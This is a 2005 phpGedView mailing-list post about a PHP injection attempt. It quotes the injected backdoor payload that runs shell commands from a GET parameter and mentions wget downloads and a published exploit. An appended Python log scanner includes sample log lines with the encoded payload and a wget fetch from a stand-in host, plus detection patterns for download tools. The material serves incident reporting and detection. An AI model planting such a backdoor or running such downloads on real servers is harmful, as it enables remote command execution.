[Phpgedview-talk] attack attempt
From: Matthew G. <ma...@po...> - 2005-12-20 19:31:56
Hi all,
I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other fields in the user table, like this:
\';error_reporting(0);if(isset($suntzu))
{system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?).
Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server. Just a heads up for everyone to keep an eye out. Grep your logs for wget.
I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit:
http://www.milw0rm.com/id.php?id=1379
...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed.
=20
Watch yourselves!
I'm guessing we need a patch of some sort.
Regards,
-- 
Matthew
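The "grep your logs for wget" advice above can be made a little more precise. The following is an added example, not code from the post or from the phpGedView project: a small Python scanner that walks Apache-style access-log lines, percent-decodes the request target, and flags two separate indicators, PHP code appearing inside a form parameter (as in the payload quoted above) and a download command aimed at a remote URL. The log lines and IP addresses are constructed for the example; only the shape of the injected payload follows the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post).
# Lines 3 and 4 mimic the register-form injection and the follow-up
# download attempt the post describes; line 5 is a benign request that a
# bare "grep wget" would flag as a false positive.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Dec/2005:18:02:11 +0000] "GET /phpGedView/individual.php?pid=I1 HTTP/1.1" 200 5123
203.0.113.5 - - [20/Dec/2005:18:02:15 +0000] "GET /phpGedView/pedigree.php?rootid=I1 HTTP/1.1" 200 8201
198.51.100.7 - - [20/Dec/2005:18:05:40 +0000] "POST /phpGedView/login_register.php?action=register&user_email=%27%3Berror_reporting(0)%3Bif(isset(%24suntzu))%7Bsystem(%24_GET%5Bsuntzu%5D)%3B%7Decho%27 HTTP/1.1" 200 411
198.51.100.7 - - [20/Dec/2005:18:06:02 +0000] "GET /phpGedView/index.php?suntzu=wget%20http%3A%2F%2Fexample.invalid%2Fx.bin HTTP/1.1" 200 58
192.0.2.9 - - [20/Dec/2005:18:10:00 +0000] "GET /phpGedView/search.php?query=wget HTTP/1.1" 200 3001
"""

# Pull the method and request target out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

# Markers of PHP source code landing in a request parameter.
PHP_INJECTION_MARKERS = (
    re.compile(r"system\s*\(", re.I),
    re.compile(r"\$_(GET|POST|REQUEST)\s*\["),
    re.compile(r"error_reporting\s*\(\s*0\s*\)"),
)

# A fetch tool followed by a remote URL; a bare word "wget" alone is not enough.
DOWNLOAD_TOOL_RE = re.compile(r"\b(wget|curl|lynx|fetch)\b\s+(https?|ftp)://", re.I)


def scan_access_log(text):
    """Return a list of hits, one per suspicious log line, with the reasons."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # Decode percent-encoding and '+' so markers hidden by encoding still match.
        target = unquote_plus(match.group("target"))
        reasons = []
        if any(p.search(target) for p in PHP_INJECTION_MARKERS):
            reasons.append("php-code-in-parameter")
        if DOWNLOAD_TOOL_RE.search(target):
            reasons.append("remote-download-command")
        if reasons:
            hits.append({
                "line": lineno,
                "client": line.split()[0],
                "path": target.split("?", 1)[0],
                "reasons": reasons,
            })
    return hits


def suspicious_clients(hits):
    """Distinct client addresses that produced at least one hit, sorted."""
    return sorted({h["client"] for h in hits})


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} {hit['path']} -> {', '.join(hit['reasons'])}")
    print("clients to review:", ", ".join(suspicious_clients(scan_access_log(SAMPLE_LOG))))
```

Decoding before matching is the important step: the injected code arrives percent-encoded, so a plain grep for `system(` on the raw log misses it, while a plain grep for `wget` catches the benign search on line 5 as well.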